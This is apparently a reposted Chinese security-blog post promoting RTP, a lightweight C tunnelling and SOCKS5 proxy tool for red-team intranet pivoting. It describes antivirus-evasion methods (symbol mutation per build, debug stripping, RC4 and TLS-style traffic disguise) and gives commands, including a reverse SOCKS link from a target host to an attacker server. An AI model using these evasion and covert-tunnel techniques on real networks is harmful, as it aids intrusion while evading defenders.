文章总结: RTP(RedTeamProxy)是一个为红队实战设计的纯C轻量级隧道与代理工具,体积不到100KB,支持TCP/UDP转发、SOCKS5及反连隧道等功能。其免杀核心思路包括动态变异编译、小体积降低特征密度、剥离调试信息和隧道层流量伪装。工具提供简单命令行操作和GUI构建器,适合临场快速部署。建议仅用于经授权的安全研究或攻防演练。 综合评分: 78 文章分类: 红队,免杀,内网渗透,安全工具
RTP – 专业免杀隧道代理 100kb!
原创
0xShe 0xShe
安全社
2026年7月3日 14:50 福建
在小说阅读器读本章
去阅读
RTP (Red Team Proxy)
一个为红队实战设计的纯 C 轻量级隧道与代理工具。
小、快、静,单文件部署,命令行直驱,支持动态变异构建。
HVV即将开始,FRP落地就杀?试试看RTP!
简介
RTP 的目标很直接:
- 用尽可能小的体积完成常见转发、桥接、SOCKS5 和反连隧道任务
- 用尽可能少的依赖降低落地和横向部署成本
- 用尽可能简单的命令减少复杂配置在现场带来的失误
它不是重控制面平台,也不是配置文件驱动的大型代理框架。它是一把偏实战、偏单兵、偏轻量的流量刀。
为什么值得用
- 纯 C 实现:无 OpenSSL、无 libuv、无额外运行时,部署直接。
- 体积轻:单进程、单事件循环、单二进制,适合现场快速投放。
- 命令简单:大部分场景只靠
-l/-r/-k/--tls就能落地。 - 支持变异构建:内置 GUI 构建器,每次编译可刷新符号变异头文件。
- 跨平台友好:Windows / Linux / macOS 输出统一由
builder.py管理。 - 场景完整:覆盖 TCP 转发、双监听桥接、SOCKS5、反连 SOCKS、反连服务、UDP 转发。
- 抛弃传统GO:FRP和IOX等都是使用GO实现,体积过大,RTP不到100KB。
功能场景
| 场景 | 说明 | 是否已实现 | | — | — | — | | TCP Forward | 本地监听转远端目标 | Yes | | TCP Bridge | 双监听桥接 | Yes | | SOCKS5 | 本地 SOCKS5 入口 | Yes | | Reverse SOCKS5 | 反连 SOCKS5,支持浏览器多连接 | Yes | | Reverse Service | 反连暴露内网服务 | Yes | | UDP Forward | UDP 本地监听转远端 | Yes |
免杀介绍
RTP 的免杀思路不是依赖单点技巧,而是从构建指纹、体积特征和流量表现三个方向一起降噪:
- 动态变异构建:每次构建都会刷新关键符号映射,减少稳定静态特征。
- 纯 C 小体积:避免大运行时和重依赖带来的固定框架指纹。
- 发布态输出:默认偏向精简产物,减少调试信息和额外构建痕迹。
- 隧道流量整形:可选
-k与--tls,用于弱化 RTP 隧道链路特征。
它的核心逻辑不是“堆壳”,而是让产物本身更轻、特征更少、链路更像正常流量。
快速开始
1. 启动构建器
python RTP.py
GUI 支持:
- 目标平台选择
- 架构选择
- 自定义编译器路径
- 实时命令生成
- 中英文切换
- 一键复制命令
2. 最常用的几条命令
TCP 正向转发
rtp -l3389-r192.168.1.10:3389
本地 SOCKS5 入口
rtp -l1080
SOCKS5 用户名密码认证
rtp -l1080--user admin --pass123456
反连 SOCKS5
# 服务器
rtp -l9998-l7777--reverse-socks
# 靶机
rtp -r <SERVER_IP>:9998 --reverse-socks--reconnect
# 攻击机
# 将 <SERVER_IP>:7777 作为 SOCKS5 入口使用
UDP 转发
rtp -l53-r8.8.8.8:53 -u
RTP 端点语义
RTP 的地址规则故意做得很简单:
9998等同于0.0.0.0:9998:9998等同于0.0.0.0:9998*:9998表示监听所有网卡@host:port表示这是一个 RTP 隧道端点
示例:
rtp -l9998
rtp -l *:1080
rtp -r192.168.1.10:3389
rtp -r @1.2.3.4:9998 -k"secret"--tls
免杀核心思路
RTP 的免杀思路不是“堆功能”,而是“减少稳定特征”:
1. 动态变异编译
构建器会自动生成 include/mutated.h,对关键函数名做随机变异。这意味着每次编译产物都不是完全相同的静态符号布局。
2. 小体积降低特征密度
RTP 本身是纯 C、小依赖、单二进制,没有庞大运行时,也没有大体量框架特征。很多工具不是功能不行,而是体积和特征过于稳定。
3. 剥离调试信息
默认构建流程使用精简参数输出发布载荷,避免把多余的调试符号、PDB 和构建痕迹一起带出去。
4. 隧道层流量伪装
-k:RC4 加密--tls:TLS AppData 风格封装@:显式标记 RTP 隧道端点
这一层不是标准 TLS 栈,而是偏实战的流量整形与特征弱化。
轻量级卖点
RTP 的价值,不只是“能转发”,而是“能在很小的代价下完成转发”:
- 更小的二进制
- 更少的依赖
- 更低的部署复杂度
- 更直观的 CLI
- 更适合临场快速切换场景
一句话概括:
RTP 不是一个重平台,而是一把偏实战的轻量流量手术刀。
支持能力
网络能力
- TCP
L-R - TCP
L-L - TCP 主动出站模式
- SOCKS5
CONNECT - SOCKS5
NO AUTH - SOCKS5
USERNAME/PASSWORD - UDP 会话化转发
- reverse SOCKS 多连接池化
构建能力
- Windows Modern / Legacy
- Linux
x64/arm64/x86 - macOS Universal
- Zig 交叉编译优先
- GUI 命令生成器
参数速览
| 参数 | 说明 |
| — | — |
| -l, --local | 本地监听地址,可出现两次 |
| -r, --remote | 远程连接地址,可出现两次 |
| -k, --key | 启用 RC4 并指定密钥 |
| --user | SOCKS5 用户名 |
| --pass | SOCKS5 密码 |
| -u, --udp | 启用 UDP 转发 |
| -q, --quiet | 完全静默 |
| --tls | 启用 TLS 风格封装 |
| --reverse-socks | 启用 reverse SOCKS 控制握手 |
| --reconnect | 启用主动出站模式自动重连 |
构建建议
推荐优先使用 GUI 构建器:
python RTP.py
如果在 Windows 下编译 Linux 目标,优先使用 Zig,并保持 zig.exe 与同级 lib/ 目录完整。
免责声明
本项目仅用于经授权的安全研究、攻防演练与防御验证。请确保所有使用行为符合当地法律法规与目标环境授权要求。
GitHub
- GitHub: https://github.com/0xShe/RTP
- 如果这个项目对你有帮助,欢迎到 GitHub 点个 Star 支持一下。
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:安全社 0xShe 0xShe《RTP – 专业免杀隧道代理 100kb!》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。









评论